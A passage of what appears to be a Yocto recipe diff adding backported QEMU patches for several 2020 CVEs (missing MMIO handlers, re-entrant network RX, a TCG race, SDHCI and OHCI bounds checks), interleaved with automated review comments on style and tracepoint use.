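+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/f867cebaedbc9c43189f102e4cdfdff05e88df7f]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/prep_systemio.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/ppc/prep_systemio.c b/hw/ppc/prep_systemio.c
+index 4e48ef2..b2bd783 100644
+--- a/hw/ppc/prep_systemio.c
++++ b/hw/ppc/prep_systemio.c
+@@ -23,6 +23,7 @@
+ */
+
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "hw/irq.h"
+ #include "hw/isa/isa.h"
+ #include "hw/qdev-properties.h"
+@@ -235,8 +236,15 @@ static uint64_t ppc_parity_error_readl(void *opaque, hwaddr addr,
+ return val;
+ }
+
++static void ppc_parity_error_writel(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps ppc_parity_error_ops = {
+ .read = ppc_parity_error_readl,
++ .write = ppc_parity_error_writel,
+ .valid = {
+ .min_access_size = 4,
+ .max_access_size = 4,
+--
+1.8.3.1
+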
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
new file mode 100644
index 0000000000..49c6c5e3e2
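--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
@@ -0,0 +1,53 @@
+From b5bf601f364e1a14ca4c3276f88dfec024acf613 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:29 +0530
+Subject: [PATCH] nvram: add nrf51_soc flash read method
+
+Add nrf51_soc mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-6-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b5bf601f364e1a14ca4c3276f88dfec024acf613 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/nvram/nrf51_nvm.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/hw/nvram/nrf51_nvm.c b/hw/nvram/nrf51_nvm.c
+index f2283c1..7b3460d 100644
+--- a/hw/nvram/nrf51_nvm.c
++++ b/hw/nvram/nrf51_nvm.c
+@@ -273,6 +273,15 @@ static const MemoryRegionOps io_ops = {
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
++static uint64_t flash_read(void *opaque, hwaddr offset, unsigned size)
++{
++ /*
++ * This is a rom_device MemoryRegion which is always in
++ * romd_mode (we never put it in MMIO mode), so reads always
++ * go directly to RAM and never come here.
++ */
++ g_assert_not_reached();
++}
+
+ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+ unsigned int size)
+@@ -300,6 +309,7 @@ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+
+
+ static const MemoryRegionOps flash_ops = {
++ .read = flash_read,
+ .write = flash_write,
+ .valid.min_access_size = 4,
+ .valid.max_access_size = 4,
+--
+1.8.3.1
+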
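diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
new file mode 100644
index 0000000000..115be68295
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
@@ -0,0 +1,61 @@
+Backport of:
+
+From 921604e175b8ec06c39503310e7b3ec1e3eafe9e Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:30 +0530
+Subject: [PATCH] spapr_pci: add spapr msi read method
+
+Add spapr msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-7-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-6.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/921604e175b8ec06c39503310e7b3ec1e3eafe9e]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/spapr_pci.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+--- a/hw/ppc/spapr_pci.c
++++ b/hw/ppc/spapr_pci.c
+@@ -52,6 +52,7 @@
+ #include "sysemu/kvm.h"
+ #include "sysemu/hostmem.h"
+ #include "sysemu/numa.h"
++#include "qemu/log.h"
+
+ /* Copied from the kernel arch/powerpc/platforms/pseries/msi.c */
+ #define RTAS_QUERY_FN 0
+@@ -738,6 +739,12 @@ static PCIINTxRoute spapr_route_intx_pin
+ return route;
+ }
+
++static uint64_t spapr_msi_read(void *opaque, hwaddr addr, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++ return 0;
++}
++
+ /*
+ * MSI/MSIX memory region implementation.
+ * The handler handles both MSI and MSIX.
+@@ -755,8 +762,11 @@ static void spapr_msi_write(void *opaque
+ }
+
+ static const MemoryRegionOps spapr_msi_ops = {
+- /* There is no .read as the read result is undefined by PCI spec */
+- .read = NULL,
++ /*
++ * .read result is undefined by PCI spec.
++ * define .read method to avoid assert failure in memory_region_init_io
++ */
++ .read = spapr_msi_read,
+ .write = spapr_msi_write,
+ .endianness = DEVICE_LITTLE_ENDIAN
+ };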
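diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
new file mode 100644
index 0000000000..7d8ec32251
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
@@ -0,0 +1,50 @@
+From 2c9fb3b784000c1df32231e1c2464bb2e3fc4620 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:31 +0530
+Subject: [PATCH] tz-ppc: add dummy read/write methods
+
+Add tz-ppc-dummy mmio read/write methods to avoid assert failure
+during initialisation.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-8-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-7.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/2c9fb3b784000c1df32231e1c2464bb2e3fc4620 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/tz-ppc.c | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/hw/misc/tz-ppc.c b/hw/misc/tz-ppc.c
+index 6431257..36495c6 100644
+--- a/hw/misc/tz-ppc.c
++++ b/hw/misc/tz-ppc.c
+@@ -196,7 +196,21 @@ static bool tz_ppc_dummy_accepts(void *opaque, hwaddr addr,
+ g_assert_not_reached();
+ }
+
++static uint64_t tz_ppc_dummy_read(void *opaque, hwaddr addr, unsigned size)
++{
++ g_assert_not_reached();
++}
++
++static void tz_ppc_dummy_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ g_assert_not_reached();
++}
++
+ static const MemoryRegionOps tz_ppc_dummy_ops = {
++ /* define r/w methods to avoid assert failure in memory_region_init_io */
++ .read = tz_ppc_dummy_read,
++ .write = tz_ppc_dummy_write,
+ .valid.accepts = tz_ppc_dummy_accepts,
+ };
+
+--
+1.8.3.1
+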
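Review bot: The new handlers `tz_ppc_dummy_read` and `tz_ppc_dummy_write` abort through `g_assert_not_reached()` but carry no comment saying why they can never run; the one-line comment inside `tz_ppc_dummy_ops` only explains why they exist. The context line above shows `tz_ppc_dummy_accepts` also ending in `g_assert_not_reached()`, so presumably no access is ever dispatched to this region, but that reasoning sits outside the hunk. I would add above the read handler something like `/* Never reached: no access is dispatched to the dummy region (see tz_ppc_dummy_accepts) */`, because an abort in an MMIO callback becomes a guest-reachable crash if that invariant ever stops holding.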
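diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
new file mode 100644
index 0000000000..7857ba266e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
@@ -0,0 +1,44 @@
+From 735754aaa15a6ed46db51fd731e88331c446ea54 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:32 +0530
+Subject: [PATCH] imx7-ccm: add digprog mmio write method
+
+Add digprog mmio write method to avoid assert failure during
+initialisation.
+
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-9-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-8.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/735754aaa15a6ed46db51fd731e88331c446ea54]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/imx7_ccm.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/misc/imx7_ccm.c b/hw/misc/imx7_ccm.c
+index 02fc1ae..075159e 100644
+--- a/hw/misc/imx7_ccm.c
++++ b/hw/misc/imx7_ccm.c
+@@ -131,8 +131,16 @@ static const struct MemoryRegionOps imx7_set_clr_tog_ops = {
+ },
+ };
+
++static void imx7_digprog_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "Guest write to read-only ANALOG_DIGPROG register\n");
++}
++
+ static const struct MemoryRegionOps imx7_digprog_ops = {
+ .read = imx7_set_clr_tog_read,
++ .write = imx7_digprog_write,
+ .endianness = DEVICE_NATIVE_ENDIAN,
+ .impl = {
+ .min_access_size = 4,
+--
+1.8.3.1
+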
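diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
new file mode 100644
index 0000000000..0f43adeea8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
@@ -0,0 +1,39 @@
+From 22dc8663d9fc7baa22100544c600b6285a63c7a3 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 22 Jul 2020 16:57:46 +0800
+Subject: [PATCH] net: forbid the reentrant RX
+
+The memory API allows DMA into NIC's MMIO area. This means the NIC's
+RX routine must be reentrant. Instead of auditing all the NIC, we can
+simply detect the reentrancy and return early. The queue->delivering
+is set and cleared by qemu_net_queue_deliver() for other queue helpers
+to know whether the delivering in on going (NIC's receive is being
+called). We can check it and return early in qemu_net_queue_flush() to
+forbid reentrant RX.
+
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+CVE: CVE-2020-15859
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/ubuntu/CVE-2020-15859.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/22dc8663d9fc7baa22100544c600b6285a63c7a3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ net/queue.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/net/queue.c b/net/queue.c
+index 0164727..19e32c8 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -250,6 +250,9 @@ void qemu_net_queue_purge(NetQueue *queue, NetClientState *from)
+
+ bool qemu_net_queue_flush(NetQueue *queue)
+ {
++ if (queue->delivering)
++ return false;
++
+ while (!QTAILQ_EMPTY(&queue->packets)) {
+ NetPacket *packet;
+ int ret;
+--
+1.8.3.1
+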
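Review bot: The new guard at the top of `qemu_net_queue_flush` is an unbraced two-line `if`, which QEMU's coding style does not allow and which is easy to break when a second statement is added later; I would write it as `if (queue->delivering) {` / `return false;` / `}`. The spot also deserves a short comment, e.g. `/* RX already in progress: refuse the re-entrant flush */`, because the reason is otherwise only in the commit message. Presumably `false` is also what the function returns when the queue could not be drained, in which case callers cannot tell the two situations apart; the rest of the body is outside the hunk, so that should be checked there.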
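diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
new file mode 100644
index 0000000000..e0a27331a8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
@@ -0,0 +1,94 @@
+CVE: CVE-2020-24165
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/886cc68943ebe8cf7e5f970be33459f95068a441 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 886cc68943ebe8cf7e5f970be33459f95068a441 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Alex=20Benn=C3=A9e?= <alex.bennee@linaro.org>
+Date: Fri, 14 Feb 2020 14:49:52 +0000
+Subject: [PATCH] accel/tcg: fix race in cpu_exec_step_atomic (bug 1863025)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The bug describes a race whereby cpu_exec_step_atomic can acquire a TB
+which is invalidated by a tb_flush before we execute it. This doesn't
+affect the other cpu_exec modes as a tb_flush by it's nature can only
+occur on a quiescent system. The race was described as:
+
+ B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+ B3. tcg_tb_alloc obtains a new TB
+
+ C3. TB obtained with tb_lookup__cpu_state or tb_gen_code
+ (same TB as B2)
+
+ A3. start_exclusive critical section entered
+ A4. do_tb_flush is called, TB memory freed/re-allocated
+ A5. end_exclusive exits critical section
+
+ B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+ B3. tcg_tb_alloc reallocates TB from B2
+
+ C4. start_exclusive critical section entered
+ C5. cpu_tb_exec executes the TB code that was free in A4
+
+The simplest fix is to widen the exclusive period to include the TB
+lookup. As a result we can drop the complication of checking we are in
+the exclusive region before we end it.
+
+Cc: Yifan <me@yifanlu.com>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1863025
+Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
+Reviewed-by: Richard Henderson <richard.henderson@linaro.org>
+Signed-off-by: Alex Bennée <alex.bennee@linaro.org>
+Message-Id: <20200214144952.15502-1-alex.bennee@linaro.org>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+---
+ accel/tcg/cpu-exec.c | 21 +++++++++++----------
+ 1 file changed, 11 insertions(+), 10 deletions(-)
+
+diff --git a/accel/tcg/cpu-exec.c b/accel/tcg/cpu-exec.c
+index 2560c90eec79..d95c4848a47b 100644
+--- a/accel/tcg/cpu-exec.c
++++ b/accel/tcg/cpu-exec.c
+@@ -240,6 +240,8 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ uint32_t cf_mask = cflags & CF_HASH_MASK;
+
+ if (sigsetjmp(cpu->jmp_env, 0) == 0) {
++ start_exclusive();
++
+ tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, cf_mask);
+ if (tb == NULL) {
+ mmap_lock();
+@@ -247,8 +249,6 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ mmap_unlock();
+ }
+
+- start_exclusive();
+-
+ /* Since we got here, we know that parallel_cpus must be true. */
+ parallel_cpus = false;
+ cc->cpu_exec_enter(cpu);
+@@ -271,14 +271,15 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ qemu_plugin_disable_mem_helpers(cpu);
+ }
+
+- if (cpu_in_exclusive_context(cpu)) {
+- /* We might longjump out of either the codegen or the
+- * execution, so must make sure we only end the exclusive
+- * region if we started it.
+- */
+- parallel_cpus = true;
+- end_exclusive();
+- }
++
++ /*
++ * As we start the exclusive region before codegen we must still
++ * be in the region if we longjump out of either the codegen or
++ * the execution.
++ */
++ g_assert(cpu_in_exclusive_context(cpu));
++ parallel_cpus = true;
++ end_exclusive();
+ }
+
+ struct tb_desc {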
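diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
new file mode 100644
index 0000000000..be19256cef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
@@ -0,0 +1,46 @@
+From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 1 Sep 2020 15:22:06 +0200
+Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The 'Transfer Block Size' field is 12-bit wide.
+
+See section '2.2.2. Block Size Register (Offset 004h)' in datasheet.
+
+Two different bug reproducer available:
+- https://bugs.launchpad.net/qemu/+bug/1892960
+- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1
+
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200901140411.112150-3-f4bug@amsat.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25085
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/sd/sdhci.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/sd/sdhci.c
+===================================================================
+--- qemu-4.2.0.orig/hw/sd/sdhci.c
++++ qemu-4.2.0/hw/sd/sdhci.c
+@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset,
+ break;
+ case SDHC_BLKSIZE:
+ if (!TRANSFERRING_DATA(s->prnsts)) {
+- MASKED_WRITE(s->blksize, mask, value);
++ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+ }
+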
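Review bot: The `SDHC_BLKSIZE` case now clamps the written value with `extract32(value, 0, 12)`, but nothing in the hunk compares the resulting block size with the size of the controller's data buffer, so any 12-bit value is stored as-is. Whether a later statement in `sdhci_write` or the buffer allocation already bounds it cannot be seen here, because the function continues outside the hunk; that should be confirmed against the qemu-4.2.0 source this patch applies to. Separately, the `Upstream-Status: Backport` line names no upstream commit, unlike the CVE-2020-15469 patches in the same change, which makes the backport harder to audit.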
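diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
new file mode 100644
index 0000000000..a46b5be193
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
@@ -0,0 +1,87 @@
+From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001
+From: Guenter Roeck <linux@roeck-us.net>
+Date: Mon, 17 Feb 2020 12:48:10 -0800
+Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI
+ to include file
+
+We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it
+to its include file.
+
+Reviewed-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Guenter Roeck <linux@roeck-us.net>
+Tested-by: Niek Linnenbank <nieklinnenbank@gmail.com>
+Message-id: 20200217204812.9857-2-linux@roeck-us.net
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 15 ---------------
+ hw/usb/hcd-ohci.h | 16 ++++++++++++++++
+ 2 files changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 8a94bd004a..1e6e85e86a 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci)
+ ohci_bus_stop(ohci);
+ }
+
+-#define TYPE_SYSBUS_OHCI "sysbus-ohci"
+-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
+-
+-typedef struct {
+- /*< private >*/
+- SysBusDevice parent_obj;
+- /*< public >*/
+-
+- OHCIState ohci;
+- char *masterbus;
+- uint32_t num_ports;
+- uint32_t firstport;
+- dma_addr_t dma_offset;
+-} OHCISysBusState;
+-
+ static void ohci_realize_pxa(DeviceState *dev, Error **errp)
+ {
+ OHCISysBusState *s = SYSBUS_OHCI(dev);
+diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h
+index 16e3f1e13a..5c8819aedf 100644
+--- a/hw/usb/hcd-ohci.h
++++ b/hw/usb/hcd-ohci.h
+@@ -22,6 +22,7 @@
+ #define HCD_OHCI_H
+
+ #include "sysemu/dma.h"
++#include "hw/usb.h"
+
+ /* Number of Downstream Ports on the root hub: */
+ #define OHCI_MAX_PORTS 15
+@@ -90,6 +91,21 @@ typedef struct OHCIState {
+ void (*ohci_die)(struct OHCIState *ohci);
+ } OHCIState;
+
++#define TYPE_SYSBUS_OHCI "sysbus-ohci"
++#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
++
++typedef struct {
++ /*< private >*/
++ SysBusDevice parent_obj;
++ /*< public >*/
++
++ OHCIState ohci;
++ char *masterbus;
++ uint32_t num_ports;
++ uint32_t firstport;
++ dma_addr_t dma_offset;
++} OHCISysBusState;
++
+ extern const VMStateDescription vmstate_ohci_state;
+
+ void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports,
+--
+2.25.1
+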
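diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
new file mode 100644
index 0000000000..8c1275b2f4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
@@ -0,0 +1,101 @@
+From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:58 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables
+
+While servicing the OHCI transfer descriptors(TD), OHCI host
+controller derives variables 'start_addr', 'end_addr', 'len'
+etc. from values supplied by the host controller driver.
+Host controller driver may supply values such that using
+above variables leads to out-of-bounds access issues.
+Add checks to avoid them.
+
+AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0
+ READ of size 2 at 0x7ffd53af76a0 thread T0
+ #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734
+ #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180
+ #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214
+ #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257
+ #4 timerlist_run_timers ../util/qemu-timer.c:572
+ #5 qemu_clock_run_timers ../util/qemu-timer.c:586
+ #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672
+ #7 main_loop_wait ../util/main-loop.c:527
+ #8 qemu_main_loop ../softmmu/vl.c:1676
+ #9 main ../softmmu/main.c:50
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Reported-by: Yongkang Jia <j_kangel@163.com>
+Reported-by: Yi Ren <yunye.ry@alibaba-inc.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-id: 20200915182259.68522-2-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++--
+ 1 file changed, 22 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 1e6e85e86a..9dc59101f9 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ }
+
+ start_offset = iso_td.offset[relative_frame_number];
+- next_offset = iso_td.offset[relative_frame_number + 1];
++ if (relative_frame_number < frame_count) {
++ next_offset = iso_td.offset[relative_frame_number + 1];
++ } else {
++ next_offset = iso_td.be;
++ }
+
+ if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) ||
+ ((relative_frame_number < frame_count) &&
+@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ }
+ } else {
+ /* Last packet in the ISO TD */
+- end_addr = iso_td.be;
++ end_addr = next_offset;
++ }
++
++ if (start_addr > end_addr) {
++ trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr);
++ return 1;
+ }
+
+ if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) {
+@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ } else {
+ len = end_addr - start_addr + 1;
+ }
++ if (len > sizeof(ohci->usb_buf)) {
++ len = sizeof(ohci->usb_buf);
++ }
+
+ if (len && dir != OHCI_TD_DIR_IN) {
+ if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len,
+@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed)
+ if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) {
+ len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff);
+ } else {
++ if (td.cbp > td.be) {
++ trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be);
++ ohci_die(ohci);
++ return 1;
++ }
+ len = (td.be - td.cbp) + 1;
+ }
++ if (len > sizeof(ohci->usb_buf)) {
++ len = sizeof(ohci->usb_buf);
++ }
+
+ pktlen = len;
+ if (len && dir != OHCI_TD_DIR_IN) {
+--
+2.25.1
+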
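Review bot: The two address-ordering checks treat the same malformed-descriptor condition differently: in `ohci_service_iso_td` a `start_addr > end_addr` descriptor only traces and returns 1, while in `ohci_service_td` the `td.cbp > td.be` case also calls `ohci_die(ohci)`. If the difference is intended it needs a comment at each site; if not, the handling should match. The general-TD path also reuses `trace_usb_ohci_iso_td_bad_cc_overrun`, an isochronous tracepoint, which will mislead anyone reading traces from a non-isochronous transfer. Both `len > sizeof(ohci->usb_buf)` clamps truncate silently; a trace event at each would make oversized guest-supplied lengths visible during an investigation. Both functions start and end outside the hunks shown.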
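diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
new file mode 100644
index 0000000000..374d7c4562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
@@ -0,0 +1,42 @@
+From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:59 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire
+
+While servicing OHCI transfer descriptors(TD), ohci_service_iso_td
+retires a TD if it has passed its time frame. It does not check if
+the TD was already processed once and holds an error code in TD_CC.
+It may happen if the TD list has a loop. Add check to avoid an
+infinite loop condition.
+
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-id: 20200915182259.68522-3-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25625
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
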